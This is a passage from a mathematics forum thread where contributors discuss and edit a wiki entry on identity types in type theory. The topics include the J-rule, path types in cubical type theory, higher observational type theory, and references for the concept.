Is that where the observation originates? • CommentRowNumber18. • CommentAuthorUrs • CommentTimeAug 5th 2018 • (edited Aug 5th 2018) Hm, it seems that my first edit-message did not get through: I had added pointer to Shulman 12 and was asking: Where is the origin of the observation that identity types are simply indctive type families generated by reflection? • CommentRowNumber19. • CommentAuthorMike Shulman • CommentTimeAug 5th 2018 Oh, way earlier than that. For instance, identity types are defined that way in Coq and have been since ever that I know of. • CommentRowNumber20. • CommentAuthorColin Tan • CommentTimeNov 28th 2018 From say the inductive definition of identities types, it is clear that the interpretation of $Id_A(x,y)$ as the type of proofs that x is less than or equal to y is excluded? For example, what if a type A is really an oo-category? So that $Id_A(x, y)$ is the type of morphisms from an object x of A to another object y of A. It would still be true that there is an identity morphism in $Id_A(x, x)$. • CommentRowNumber21. • CommentAuthorAli Caglayan • CommentTimeNov 28th 2018 @Colin I think what you are trying to say is “can we have directed ’identitity’ types”. From the given inductive definition, the answer is a straight no however many people have and still are investigating similar types where they behave more like arrows of a category rather than of groupoids. I wouldn’t call this the identitiy type however. The symmetry of Id_A(x,y) isn’t something we add on but it is actually something that can be proven so if you were to have an arrow type it wouldn’t look very similar to the identity type. I would look at directed type theory, although I must say it isn’t very developed yet. • CommentRowNumber22. • CommentAuthorDavid_Corfield • CommentTimeNov 28th 2018 • (edited Nov 28th 2018) You can of course do category theory in HoTT, see sec 9.1 of the HoTT book. This will involve a type of objects and then a dependent type of morphisms between two objects. But that’s not the identity type. In a category, the type of isomorphisms between two objects will equal their identity type. As Alizter says, also look at directed homotopy type theory. • CommentRowNumber23. • CommentAuthorAli Caglayan • CommentTimeNov 28th 2018 There isn’t much content in the article David linked, but you should definitely look at some of the references. That is pretty much all the work that has been done on the topic. • CommentRowNumber24. • CommentAuthorColin Tan • CommentTimeNov 28th 2018 Alizter, thank you very much for the pointers and for articulating what I was trying to ask in better language. Do you have a reference for a proof that $Id_A(x, y)$ is symmetric? Mike also makes a comment on the derivability of this at Martin-Löf+dependent+type+theory#equality_types. • CommentRowNumber25. • CommentAuthorDavid_Corfield • CommentTimeNov 28th 2018 Lemma 2.1.1 of the HoTT book. Essentially, by induction for identity types, you just have to show that the $refl$ terms have inverses, which clearly they do. 2. Fixed a tiny typo: an -> a anqurvanillapy • CommentRowNumber27. • CommentAuthorUrs • CommentTimeJun 25th 2019 pointers to the original observations relating identity types to groupoids and higher groupoids were and still largely are missing from this entry. But I have now added at least these two: • Martin Hofmann, Thomas Streicher The groupoid interpretation of type theory, in: Giovanni Sambin et al. (ed.) , Twenty-five years of constructive type theory, Proceedings of a congress, Venice, Italy, October 19—21, 1995. Oxford: Clarendon Press. Oxf. Logic Guides. 36, 83-111 (1998). (ps) • Steve Awodey, Michael Warren, Homotopy theoretic models of identity type, Mathematical Proceedings of the Cambridge Philosophical Society vol 146, no. 1 (2009) (arXiv:0709.0248) • CommentRowNumber28. • CommentAuthorUrs • CommentTimeMay 12th 2021 added ISBN and uploaded the pdf for: • Martin Hofmann, Thomas Streicher The groupoid interpretation of type theory, in: Giovanni Sambin et al. (eds.) , Twenty-five years of constructive type theory, Proceedings of a congress, Venice, Italy, October 19—21, 1995. Oxford: Clarendon Press. Oxf. Logic Guides. 36, 83-111 (1998). (ISBN:9780198501275, ps, pdf) • CommentRowNumber29. • CommentAuthorUrs • CommentTimeMay 12th 2021 This entry has offered no original references. I have now added pointer to • Per Martin-Löf, Section 1.7 in: An intuitionistic theory of types: predicative part, in: H. E. Rose, J. C. Shepherdson (eds.), Logic Colloquium ’73, Proceedings of the Logic Colloquium, Studies in Logic and the Foundations of Mathematics 80 Pages 73-118, Elsevier 1975 (doi:10.1016/S0049-237X(08)71945-1, CiteSeer) but that (that section 1.7) is hardly satisfactory. What’s a canonical original reference? • CommentRowNumber30. • CommentAuthorUrs • CommentTimeMay 12th 2021 • (edited May 12th 2021) this one shows the rules, but gives no discussion otherwise: • CommentRowNumber31. • CommentAuthorUrs • CommentTimeMay 12th 2021 This one has more: • CommentRowNumber32. • CommentAuthorUrs • CommentTimeMay 13th 2021 • CommentRowNumber33. • CommentAuthorGuest • CommentTimeJan 26th 2022 Whenever editing is re-enabled a link to cocylinder should be placed in the Related concepts section. • CommentRowNumber34. • CommentAuthorGuest • CommentTimeMay 21st 2022 This article only focuses upon the identity types that appear in Martin-Löf type theory. So what do we do about all the other inequivalent identity types in other type theories, such as the identity types in cubical type theory defined using a primitive interval, and the identity types in higher observational type theory? • CommentRowNumber35. • CommentAuthorUrs • CommentTimeMay 21st 2022 You need to ask what a reader deserves to see when looking for information and happening upon a page with a given title. I suppose that a reader looking to understand what is meant by “identity type” will want to be shown all possible meanings. So if there are more than currently discussed in the page, then the page deserves to be re-organized/expanded. 3. started brief section on identity types in higher observational type theory, somebody with a better understanding of the subject like Mike Shulman could expand on it further Anonymous • CommentRowNumber37. • CommentAuthorGuest • CommentTimeAug 6th 2022 path type redirects here, but in the cubical type theory literature, path types are different from identity types in that most of them do not satisfy the J rule definitionally, but only up to a path. • CommentRowNumber38. • CommentAuthorGuest • CommentTimeSep 2nd 2022 created path type article. propositional equality redirects here as well, but should be created and made into a disambiguation article with links to both identity type and path type. • CommentRowNumber39. • CommentAuthorMike Shulman • CommentTimeSep 3rd 2022 • (edited Sep 3rd 2022) I would actually prefer that the phrase “identity type” be usable for whatever notion is appropriate for the particular type theory. This includes the Martin-Lof identity type (a.k.a. “jdentity type”), the path type of cubical type theroies, and the identity type of higher observational type theory, all of which satisfy different formal rules but are still “types of identifications”. • CommentRowNumber40. • CommentAuthorGuest • CommentTimeSep 3rd 2022 Andrew Swan thinks differently in this article We give a collection of results regarding path types, identity types and univalent universes in certain models of type theory based on presheaves. The main result is that path types cannot be used directly as identity types in any Orton-Pitts style model of univalent type theory with propositional truncation in presheaf assemblies over the first and second Kleene algebras. We also give a Brouwerian counterexample showing that there is no constructive proof that there is an Orton-Pitts model of type theory in presheaves when the universe is based on a standard construction due to Hofmann and Streicher, and path types are identity types. A similar proof shows that path types are not identity types in internal presheaves in realizability toposes as long as a certain universe can be extended to a univalent one. We show that one of our key lemmas has a purely syntactic variant in intensional type theory and use it to make some minor but curious observations on the behaviour of cofibrations in syntactic categories. • CommentRowNumber41. • CommentAuthorMike Shulman • CommentTimeSep 3rd 2022 Yes, I’m aware that cubical type theorists tend to use “identity type” to mean the Martin-Lof one. (Although in cubical type theory there is also a “Swan identity type” that’s different from both path types and ML identity types.) I’m saying I would rather advocate a different usage. Some cubical type theorists have taken to calling the ML identity type the “jdentity type”, since its defining feature is the J rule. • CommentRowNumber42. • CommentAuthorMike Shulman • CommentTimeSep 3rd 2022 As evidence supporting my preference, let me point out that the phrase “identity type” is already used in both intensional type theory and extensional type theory, even though the identity types of those two theories satisfy different rules. • CommentRowNumber43. • CommentAuthorGuest • CommentTimeSep 3rd 2022 Many cubical type theorists make the distinction between identity types like Martin-Löf’s identity types, Swan’s identity types, and the higher observational type theory identity types, where the rules for the identity types all imply the definitional J rule as a theorem (and they call all 3 types ’identity types’), vs the cubical path types where the rules only imply the J rule up to a path, and additional regularity rules are needed to make the J rule definitionally valid. No additional regularity rule has been found to be compatible with univalence in cubical type theories yet. • CommentRowNumber44. • CommentAuthorDavid_Corfield • CommentTimeSep 3rd 2022 Can we do better than this? Identity types in cubical type theory are called path types and are defined using a primitive interval. I’m not exactly sure how they work so somebody with more expertise with cubical type theory should expand on it. • CommentRowNumber45. • CommentAuthorMike Shulman • CommentTimeSep 3rd 2022 The identity types of higher observational type theory also do not satisfy definitional computation for J. • CommentRowNumber46. • CommentAuthorMike Shulman • CommentTimeSep 3rd 2022 Also, if someone wants to do mathematics “agnostically” in higher type theory, so that what they write could be interpreted equally well in Book HoTT, cubical type theory, or higher observational type theory, they can do that technically by assuming just an “identity type” with a propositional J-rule. But they then have to call that type something, and I don’t know what they could call it other than an “identity type”. • CommentRowNumber47. • CommentAuthorGuest • CommentTimeSep 3rd 2022 @Guest at 43 Cubical type theorists make the distinction between path types and identity types because path types are literally functions out of an interval, just like how paths in Euclidean space are functions out of the unit interval, not because of the definitional/propositional J distinction. Otherwise, why are the types in XTT called “path types” instead of “identity types”? They satisfy definitional J by coercion and regularity. Nathan • CommentRowNumber48. • CommentAuthorGuest • CommentTimeSep 3rd 2022 @Mike Shulman at 46 The definitional/propositional J could be distinguished by calling the identity type with definitional J a “strict identity type” and the identity type with propositional J a “weak identity type”. Type theory already uses “strict” and “weak” terminology for other such objects in type theory: compare “strict Tarski universe” vs “weak Tarski universe”, “strict proposition” and “weak proposition”, “strict squash type” and “weak squash type”, et cetera, where the difference between the structures are that the “strict” versions use definitional equality while the “weak” versions use propositional equality. Nathan • CommentRowNumber49. • CommentAuthorGuest • CommentTimeSep 3rd 2022 Nathan, If one includes the interval type in MLTT then identity types between objects of a type are also functions out of the interval to the type. But identity types in homotopy type theory (or any model of MLTT with the interval type) are not usually called “path types”. So that doesn’t explain why path types are called path types in cubical type theory. • CommentRowNumber50. • CommentAuthorGuest • CommentTimeSep 4th 2022 The definitional J rule implies the propositional J rule, but the converse doesn’t hold, so one should take the propositional J rule to be the defining characteristic of identity types, as those apply for all known identity types, not just the Martin-Löf identity types. This is similar to the case for W-types and higher inductive types, the computation rules are only up to a path, rather than involving definitional equality. • CommentRowNumber51. • CommentAuthorGuest • CommentTimeSep 4th 2022 The real problem with path types in cubical type theory are that technically they aren’t identity types, they are dependent identity types, in the same way a dependent function type is not a function type, and so they should actually be described on the article on dependent identity types rather than this article. • CommentRowNumber52. • CommentAuthorGuest • CommentTimeSep 4th 2022 @50 What do you mean by “propositional J rule”? Suppose one has a cubical higher observational type theory with Swan’s identity types; there are 3 separate identity types $\mathrm{idHOTT}$, $\mathrm{idSwan}$, and $\mathrm{Path}$. From there one could define 4 separate propositional computational rules (the elimination rule being the same for all 4) for the Martin-Löf identity types, resulting in 4 separate identity types $\mathrm{idML}0$, $\mathrm{idML}1$, $\mathrm{idML}2$, $\mathrm{idML}3$: $\frac{\Gamma \vdash a:A \quad \Gamma, x:A, p:\mathrm{idML}0_A(a, x) \vdash P(x, p) \; \mathrm{type}}{\Gamma, u:P(a, \mathrm{refl}_A) \vdash q:\mathrm{idML}0_{P(a, \mathrm{refl}_A)}(\mathrm{indeq}_a(u, a, \mathrm{refl}_A), u)}$ $\frac{\Gamma \vdash a:A \quad \Gamma, x:A, p:\mathrm{idML}1_A(a, x) \vdash P(x, p) \; \mathrm{type}}{\Gamma, u:P(a, \mathrm{refl}_A) \vdash q:\mathrm{idHOTT}_{P(a, \mathrm{refl}_A)}(\mathrm{indeq}_a(u, a, \mathrm{refl}_A), u)}$ $\frac{\Gamma \vdash a:A \quad \Gamma, x:A, p:\mathrm{idML}2_A(a, x) \vdash P(x, p) \; \mathrm{type}}{\Gamma, u:P(a, \mathrm{refl}_A) \vdash q:\mathrm{idSwan}_{P(a, \mathrm{refl}_A)}(\mathrm{indeq}_a(u, a, \mathrm{refl}_A), u)}$ $\frac{\Gamma \vdash a:A \quad \Gamma, x:A, p:\mathrm{idML}3_A(a, x) \vdash P(x, p) \; \mathrm{type}}{\Gamma, u:P(a, \mathrm{refl}_A) \vdash q:\mathrm{Path}_{P(a, \mathrm{refl}_A)}(\mathrm{indeq}_a(u, a, \mathrm{refl}_A), u)}$ 4. added some more details about identity types in cubical type theory, mentioning both the dependent identity type called the path type and the non-dependent identity type by Andrew Swan Anonymous • CommentRowNumber54. • CommentAuthorGuest • CommentTimeSep 4th 2022 dependent path types in cubical type theory are not dependent identity types, because the interval primitive $I$ is not a type! That is another reason why path types in cubical type theory should be considered different from identity types. • CommentRowNumber55. • CommentAuthorMike Shulman • CommentTimeSep 4th 2022 This discussion would be a lot easier to follow if everyone would sign their comments with a name. Pseudonyms would be fine, just something so we can distinguish between all the Guests and Anonymice. Please?!? Re 48: I suppose, although I would prefer the meaning of “identity type” to be theory-dependent. In HOTT I wouldn’t want to have to always say “weak identity type” rather than just “identity type”. Re 49: Not by definition. Book HoTT doesn’t have a notion of “extension type” that one could use to define a notion of “path type” out of the interval with fixed endpoints. So even though in some imprecise sense, identifications in Book HoTT are “equivalent to” functions out of the interval type, they’re not defined to be such the way they are in cubical type theories. Re 51: The general form of path-types is a dependent identity type, but they specialize to non-dependent identity types in the case of constant dependence or reflexivity in the base. So they are identity types, and more. The identity types of HOTT also behave like this. Re 52: But because any weak identity type is equivalent to any other, all of those propositional computation rules are inter-derivable. So the difference doesn’t really matter. Re 54: What do you mean? The interval is not a type, but the path types are types! • CommentRowNumber56. • CommentAuthorsteveawodey • CommentTimeSep 4th 2022 I agree that the various identity/path/identification/equality types are all “identity types” in a general sense and can usefully be discussed and distinguished in the same place. 5. added a brief list of the kinds of identity types to the introduction section, and also an explanation to what distinguishes identity types from other type families and an explanation of the two different J-rules. Anonymous 6. adding paragraph to explain the difference between dependent and non-dependent identity types Anonymous 7. There exist intensional type theories for which there is no such notion of definitional equality, and so the only possible notion of identification elimination in that theory is the one which uses the identity type for equality. Benno van den Berg and Martijn den Besten came up with such a type theory: • CommentRowNumber60. • CommentAuthorMike Shulman • CommentTimeSep 6th 2022 Clarified the paragraph about dependent identity types a bit. • CommentRowNumber61. • CommentAuthorMike Shulman • CommentTimeSep 6th 2022 Although I’m not sure that this much detail about dependent identity types is appropriate in the “Idea” section. Maybe it should appear further down. • CommentRowNumber62. • CommentAuthorGuest • CommentTimeSep 9th 2022 What does the semicolon mean in the judgment $J(t;x,y,p):C(x,y,p)$? • CommentRowNumber63. • CommentAuthorMike Shulman • CommentTimeSep 10th 2022 It’s just a way of separating the first argument of $J$ from the last three. Optional. • CommentRowNumber64. • CommentAuthorUrs • CommentTimeSep 23rd 2022 I am removing the following redirects and copying them instead into the entry transport: [[!redirects principle of substitution]] [[!redirects principle of substitution of equals for equals]] [[!redirects principle of substituting equals for equals]] • CommentRowNumber65. • CommentAuthorUrs • CommentTimeSep 25th 2022 • (edited Sep 25th 2022) I am going to add to this page a semi-formal explanation of Id-types that has a chance of being intelligible to intelligent outsiders. The strategy would be to recall from the forefathers that identifications satisfy three rules: 1. everything is canonically identified with itself; 2. identified things are indiscernible 3. identifications have reverses. and then to observe that the evident operational/constructive formulation of these three items is, in this order, nothing but: 1. $Id$-intro 2. transport 3. $Id$-uniqueness principle and finally to conclude with proving that • (2) and (3) $\;\;\Leftrightarrow\;\;$ J-rule . This is, of course, essentially the (meta-)logic proposed by Ladyman & Presnell 2015, minus some verbosity. I admit that I only recently looked at their article in detail, for the first time, and took note of their actual point. Now I am struck by how relevant this is. The (straightforward but not completely trivial) formal proofs for the last step are also spelled out in the Bachelor thesis Götz 2018. This leads to an evident bibliographic question: Is it the case that the literature making explicit the above foundational point of HoTT consists of one Philosophy-article and one Bachelor thesis? I suppose experts will feel this is all well-known, but before I write an exposition into the nLab entry: Are there other references making this explicit? • CommentRowNumber66. • CommentAuthorUrs • CommentTimeSep 25th 2022 An early version of the kind of motivation/overview/explanation that I want to add is now here: MetaLogicOfIdentifications-220925.jpg. Will further fine-tune tomorrow. • CommentRowNumber67. • CommentAuthorMike Shulman • CommentTimeSep 26th 2022 Well, L&P say clearly in the beginning of section 6 It is known to type theorists that the two principles discussed below entail path induction – see, for example, [12, pp. 23- 29], but as far as we are aware they do not put this fact to use in the way we do here. [12] is Thierry Coquand. Equality and Dependent Type Theory. A talk given for the 24th AILA meeting, Bologna, February 2011. This fact is also the way that the J-rule is proven from the other primitives in cubical type theory and in H.O.T.T. In general, I’m not hugely impressed with that L&P paper. It seems to me that if you’re willing to accept equality in a based path space as the correct notion of “uniqueness” for Id-types, there’s nothing preventing you from similarly accepting the based J-rule as justified by a claim that “all identifications are refl” (which they reject) in exactly the same sense that equality in a based path space is the proper sort of uniqueness. I’m also not convinced that Id-uniqueness corresponds to “reverses”. It’s true that one of the two possible orientations of Id-uniqueness involves in particular a path in the opposite direction (although the other possible orientation does not). But even then, there’s still something nontrivial going on in identifying the obvious equality $p \bullet p^{-1} = refl$ with the necessary equality in a Sigma-type. Indeed, I have no idea how to prove that those two equalities are equivalent without already using the J-rule or something equivalent to it. • CommentRowNumber68. • CommentAuthorUrs • CommentTimeSep 26th 2022 in exactly the same sense That’s the point: but it makes it explicit and disentangles it from the transport aspect. In contrast, what trips newcomers when they are first shown the J-rule is that, first, it comes as a surprise to consider dependency on identifications in a fundamental axiom; and, second, that it remains mysterious how those identifications-of-identifications work. Both of these puzzles are clarified by decomposing J as Transport plus Reversal. And if, as you say This fact is also the way that the J-rule is proven from the other primitives in cubical type theory and in H.O.T.T. it seems worthwhile even beyond the pedagogic aspect. Regarding: Thierry Coquand. Equality and Dependent Type Theory Thanks for the pointer! I had missed that. So in addition to one Phil-article and one Bachelor thesis there is one slide! I will add these pointers to the entry now, with commentary. • CommentRowNumber69. • CommentAuthorMike Shulman • CommentTimeSep 26th 2022 As I said, I don’t believe that Id-uniqueness is correctly described as “reversal”. I can see a pedagogical point to derive J from Id-uniqueness (as well as its practical uses). I was just saying that I don’t think it changes the philosophical situation any. • CommentRowNumber70. • CommentAuthorUrs • CommentTimeSep 26th 2022 I heard you say it, but don’t know what you mean, it sounds counterfactual. • CommentRowNumber71. • CommentAuthorDavid_Corfield • CommentTimeSep 26th 2022 I’m struggling to see what’s at stake here. • Is the objection to L&P in #67 that they’re looking to derive the J-rule from other assumptions, but to show this derivation fully they would need to rely on the J-rule? And in any case, the kinds of reasoning to justify these other assumptions are of the same kind that would justify the J-rule straight off? • Is there a difference between book HoTT and cubical type theory or H.O.T.T. in this regard? • What is the “philosophical situation” (#69)? • CommentRowNumber72. • CommentAuthorAlmaza213434567 • CommentTimeSep 26th 2022 • (edited Sep 26th 2022) I heard you say it, but don’t know what you mean, it sounds counterfactual. https://elpasofenceinstallationcompany.com/ • CommentRowNumber73. • CommentAuthorUrs • CommentTimeSep 26th 2022 re #71: The entry identity type currently does a terrible job at explaining its subject to an audience not yet familiar with it. I’ll write an intelligible Idea-section, using exposition as shown #66. Still busy with something else, though. • CommentRowNumber74. • CommentAuthorDavid_Corfield • CommentTimeSep 26th 2022 I certainly agree that the current state of the page is bad. And one might hope for there to be some account which both is excellent pedagogically and gets at the essence of the concept. Does the need to do this simultaneously for all type theories present a problem? • CommentRowNumber75. • CommentAuthorMike Shulman • CommentTimeSep 26th 2022 Is the objection to L&P in #67 that they’re looking to derive the J-rule from other assumptions, but to show this derivation fully they would need to rely on the J-rule? And in any case, the kinds of reasoning to justify these other assumptions are of the same kind that would justify the J-rule straight off? More the latter. They don’t call Id-elimination “reversal”, which is where I think you already need to have the J-rule. Is there a difference between book HoTT and cubical type theory or H.O.T.T. in this regard? I believe so. CTT and HOTT don’t take the J-rule as primitive, so the problem of justifying their rules is a different one. What is the “philosophical situation” (#69)? A reference back to #67. • CommentRowNumber76. • CommentAuthorMike Shulman • CommentTimeSep 26th 2022 Urs, I don’t know what you mean by “it sounds counterfactual”. I’m saying that the version of Id-uniqueness that you need in order to derive J does not coincide with any intuitive statement of “reversal”, unless you already have the J-rule to prove them equivalent. • CommentRowNumber77. • CommentAuthorGuest • CommentTimeSep 26th 2022 The only difference w/regards to the J-rule between the identity/path types in cubical type theory and higher observational type theory and the identity types as usually presented in Martin-Löf type theory is that in cubical/higher observational, the computation rule uses an identity type while in Martin-Löf the computation rule uses definitional equality. With transport, the situation is reversed: in cubical/higher observational, transport uses definitional equality, while Martin-Löf uses an identity type. However, definitional equality isn’t really relevant here: definitional equality of two elements implies having a term of the identity type between two elements; i.e. the definitional computational rules of Martin-Löf identity types imply the propositional computation rule, and the definitional transport rules of cubical/higher observational’s identity/path types imply the propositional transport rules. As a result, one could replace both instances of definitional equality with propositional equality in the definition of an identity type the resulting definition will apply to more type theories, including those like objective type theory mentioned above in comment 59 which lack definitional equality entirely. • CommentRowNumber78. • CommentAuthorGuest • CommentTimeSep 26th 2022 David Corfield wrote Is there a difference between book HoTT and cubical type theory or H.O.T.T. in this regard? Yes. Book HoTT’s identity types are by default homogeneous identity types, while both cubical type theory’s path types and H.O.T.T.’s identity types are heterogeneous identity types. The motivation for making homogeneous identity types the default and constructing heterogeneous identity types out of homogeneous identity types is likely different from the motivation for making heterogeneous identity types the default and constructing homogeneous identity types out of heterogeneous identity types. Scott Morris • CommentRowNumber79. • CommentAuthorUrs • CommentTimeSep 26th 2022 the version of Id-uniqueness that you need in order to derive J does not coincide with any intuitive statement of “reversal” The intuitive picture is this: $\array{ && x \\ & \mathllap{{}^{\text{some identification}}}\swarrow &\Rightarrow& \searrow{}^{\mathrlap{\text{trivial identification}}} \\ y && \underset{\mathclap{\text{reverse identification}}}{\xrightarrow{\phantom{---------}}} && x }$ • CommentRowNumber80. • CommentAuthorGuest • CommentTimeSep 26th 2022 @79 Whether the default identity type in the type theory is heterogeneous or homogeneous is irrelevant to this discussion; I think by the fact that we have a separate article for dependent identity type strongly indicates that this article is about the homogeneous/non-dependent identity types. And non-dependent identity types have certain properties which hold universally across type theories regardless if the non-dependent identity types are primitive in the theory or derived from some other type family, such as the propositional J-rule, propositional transport, and reflexivity, and the fact that their categorical semantics is a path space object. So we could and should motivate general identity types by these properties which hold for all definitions of non-dependent identity types. • CommentRowNumber81. • CommentAuthorGuest • CommentTimeSep 26th 2022 sorry I meant @78 not @79 • CommentRowNumber82. • CommentAuthorGuest • CommentTimeSep 27th 2022 There are also Swan identity types. What are the motivation behind those identity types, and how is that different from the motivation behind Martin-Löf identity types? • CommentRowNumber83. • CommentAuthorUrs • CommentTimeSep 27th 2022 Oh, I see. I guess you mean that we need the identification-of-identifications in the other direction. In which case it expresses that identifications may be composed with self-identifications. In fact that’s closer to what Leibniz actually says – for what it’s worth. • CommentRowNumber84. • CommentAuthorUrs • CommentTimeSep 27th 2022 • (edited Sep 27th 2022) I have now re-written the Idea-section of the entry (starting here). The main new part is the sub-section “Idea – ML identity types” (now here) which means to introduce the reader to what’s going on in a more generally intelligible way. (The previous statement of the J-rule was a bit like showing ASCII art after removing all its whitespace characters. That statement is still kept in the Definition-section, where it used to be. But if we had more energy, this would deserve to be typeset more readably, too.) I have tried to keep all material previously in the Idea-section, after re-arranging it slightly. That old material, subject to little adjustments, is now in brief sub-sections “Idea – Cubical identity types” (here) and “Idea – Strict identity types” (here). There is still much room to improve these further. • CommentRowNumber85. • CommentAuthorDavid_Corfield • CommentTimeSep 27th 2022 Should we have something on this page on identity types and adjunctions? I remember this paper as arguing against the justification in Ladyman & Presnell 2015, and in favour of one by adjoints: • Patrick Walsh, Categorical harmony and path induction, Review of Symbolic Logic 10(2): 301-321 (2017) (pdf) See in particular p. 20. His own justification is on p. 18 1. Identity is a concept determined by adjoint and so has a meaning-bearing inferential role, being categorically harmonious; 2. The inferential role of identity in these hyperdoctrines indeed provides a justification for path induction. He notes The proof that path induction is derivable from the definition of identity in a hyperdoctrine can be found in the appendix to [35]. The proof there is due to Steve Awodey. [35] is his masters thesis. • CommentRowNumber86. • CommentAuthorDavid_Corfield • CommentTimeSep 27th 2022 Another criticism of L&P’s justification of path induction comes in • Ansten Klev, (2019a). The justification of identity elimination in Martin-Löf’s type theory. Topoi, 38, 577–590. (doi:10.1007/s11245-017-9509-1) The justification of Id-elimination suggested by Ladyman and Presnell (2015, p.401ff.) consists in treating (Ind) and (Uniq) as primitive principles of type theory and showing how Id-elimination may be derived on that basis. It is not clear to me what is gained by this approach. Although the postulation of (Ind) and (Uniq) allows one to derive Id-elimination, these postulations themselves of course have to be justified. His own justification comes from Martin-Löf’s meaning explanation. More by him on justifying the identity elimination rule here: • CommentRowNumber87. • CommentAuthorUrs • CommentTimeSep 27th 2022 arguing against It really is self-evident – I bet you could check this on lay people and kids in your vicinity: Given an identification $x \xrightarrow{\; p \;} y$, there is an evident identification-of-identifications between $id_x \circ p$ and $p$. The forefathers would have stated this, had they only thought about identifications being constructions instead of just properties. But a contemporary kid who knows what a computer is will know that a computer decrypting an email and one decrypting that email and then doing nothing have performed the same task. • CommentRowNumber88. • CommentAuthorUrs • CommentTimeSep 27th 2022 I have the impression that the names of Ladyman and Presnell keep derailing the discussion unnecessarily. We saw above that their idea is due to Coquand and is at the heart of modern HoTT-provers – that should be sufficient proof by authority that this is worthwhile, if that is necessary and if we cannot agree on what is “pre-mathematically self-evident”. But mainly – and this is what got me here before I even reminded myself of Ladyman and Presnell’s – it seems clearly helpful for appreciating the J-rule to realize that it is transport along the evident paths-of-paths. I find it puzzling that such an obvious and obviously helpful remark leads to debate. Every introduction to HoTT ought to say this. Anyway, I have now made the edits to the entry that I had announced in #65. I feel like this drastically improves on the expository use of the entry. I can try to make further tweaks where it helps the exposition, otherwise I will bow out of the debate. • CommentRowNumber89. • CommentAuthorDavid_Corfield • CommentTimeSep 27th 2022 • (edited Sep 27th 2022) Typo: in the box in IIb, above the ’w’ of ’with the self-identification’, it should be $x'$ rather than $x$. It really is self-evident Walsh just says How are we to justify, without mathematical knowledge, the claim that identity types should be inhabited by terms identical to the trivial identification up to propositional identity over $E_a$? Although I think this is patently not pre-mathematical, I will not dwell on the point here. Where you write Given an identification $x \xrightarrow{\; p \;} y$, there is an evident identification-of-identifications between $id_x \circ p$ and $p$, isn’t it Mike’s point above (#67) that the passage from an obvious composition of identities (as in yours here) to an equality in a Sigma-type (which is what you need) is not obvious: there’s still something nontrivial going on in identifying the obvious equality $p \bullet p^{-1} = refl$ with the necessary equality in a Sigma-type. I guess in your case he’s asking how $\bar{p}_{\ast}$ is constructed. • CommentRowNumber90. • CommentAuthorGuest • CommentTimeSep 27th 2022 Is equality in classical mathematics definitional equality? I was under the impression that it was a form of propositional equality, since material set theory over first order logic is a simple type theory which consists of a type $Set$ or $V$ of sets and a type $Prop$ of propositions, and equality is defined as an equivalence relation on sets which is a binary predicate valued in propositions. • CommentRowNumber91. • CommentAuthorGuest • CommentTimeSep 27th 2022 @90 That is one presentation of material set theory over first order logic, and not the most usual presentation of material set theory over first order logic in type theory. In the usual presentation of material set theory over first order logic, one judges $A \; \mathrm{prop}$ directly, rather than judge $\mathrm{Prop} \; \mathrm{type}$ and $A:\mathrm{Prop}$. Similarly, one judges $B \; \mathrm{set}$ directly, rather than judge $\mathrm{Set} \; \mathrm{type}$ and $B:\mathrm{Set}$. In this regards, it is very similar to a system like simplicial type theory or cubical type theory where there are different levels for the propositional logic or face formulas and the set theory or type theory • CommentRowNumber92. • CommentAuthorGuest • CommentTimeSep 27th 2022 But regardless, one would still say that given two sets $A$ and $B$, equality $A = B$ is judged to be a proposition. In homotopy type theory, one see the same thing with universes and type judgments. One often works with Russell universes (where every type is a judged to be a member of a universe type like $A : \mathcal{U}_i$, where $i$ is a natural number representing the universe level. But one could equally work with Coquand type judgments, where one has an hierarchy of type judgments $A \; \mathrm{type}_i$ rather than a hierarchy of universes $A : \mathcal{U}_i$. So I don’t see how switching between judgments and universes/type of sets/type of propositions changes anything substantial semantically, whether it be for homotopy type theory or for set theory over first order logic. • CommentRowNumber93. • CommentAuthorUrs • CommentTimeSep 28th 2022 • (edited Sep 28th 2022) re: #89: The typo in the box in (IIb) I have fixed now, thanks for catching this! Also, I have added the previously missing computation rule to the box for (IIa). in your case he’s asking how $\bar{p}_{\ast}$ is constructed. But it’s clearly not “constructed”: It’s the “meaning explanation” of what the uniqueness axiom bluntly asserts! I have recalled the illustration in #79 (and for the reverse direction in the entry here). If anyone is lacking the “pre-mathematical” intuition to read this diagram (?), they can regard it as literally being the 2-simplex which models the corresponding path-of-paths in the simplicial model. (I have now added a corresponding comment to the entry, here, if it helps.) $\,$ re: #90: Thanks for catching this, that was my bad. You were referring to the words “definitional equality” in the second paragraph here, and I have deleted these two words now. • CommentRowNumber94. • CommentAuthorUrs • CommentTimeSep 28th 2022 have added (here) also a box for path lifting • CommentRowNumber95. • CommentAuthorDavid_Corfield • CommentTimeSep 28th 2022 • (edited Sep 28th 2022) But it’s clearly not “constructed”: It’s the “meaning explanation” of what the uniqueness axiom bluntly asserts! So I guess two wings (of the computational trilogy/trinity) are objecting to that axiomatic assertion. Klev (acknowledging Sundholm and Martin-Löf) in the first paper in #86 provides what he takes to be the meaning explanation for the J-rule, arguing that it fits in with the typical ML approach to type formation. By contrast, The approach suggested by Ladyman and Presnell moreover breaks the general pattern in type theory of furnishing set-forming operators with introduction- and elimination rules, since the Id-elimination rule is now replaced by two postulates that cannot be regarded as elimination rules. It seems to me a great insight, first developed in Martin-Löf (1971), that propositional identity can be treated by means of such rules. For him, postulation of the uniqueness axiom is no better justified than other proposals, such as UIP, for Id-types (is that what Mike is saying in #67?), not the right kind of justification he sees as possible for the J-rule (as he gives in section 4). Then Walsh (acknowledging Awodey) takes his departure from the universal constructions of category-theoretic adjunctions. Presumably as a positive type, the Id-introduction and elimination rules just fall out as usual as the unit of the corresponding monad/ Hom isomorphism (as here). Why, from a category-theoretic point of view, would one expect further analysis of what is the expression of a left universal property to be illuminating? Do we ever do that for other universal constructions? So both parties want Intro/Elim as basic, but for different reasons (or maybe not so different). The type theorists because this is how to give proper meaning explanations, and the category theorist because this is how to express universal constructions. • CommentRowNumber96. • CommentAuthorUrs • CommentTimeSep 28th 2022 I promised to bow out of this kind of kind of discussion. (E.g. I find it weird to cite people not for their insight but for their insistence on not understanding something! ;-o) But I’ll offer this, for comparison: Here at math.SE:q/4379724 is exhibited the typical puzzlement that newcomers have with the J-rule – there are two parts of puzzlements: 1. Why consider a dependency on identifications in the first place and 2. how is it that identifications all relate to the trivial one? The top reply math.SE:a/4379766 starts with a verbose part It’s tricky… It’s extremely surprising …. struggled with this … but eventually, in its last paragraph, it gives the explanation: by pointing out that one is evaluating transport on the paths that contract the based path space. This is what addresses both points of the puzzlement. Of course, young genius readers of the nLab who grasp the J-rule without this kind of explanation are free to skip the Idea-section and jump to the Definition-section of our entry. I think no harm is done by my 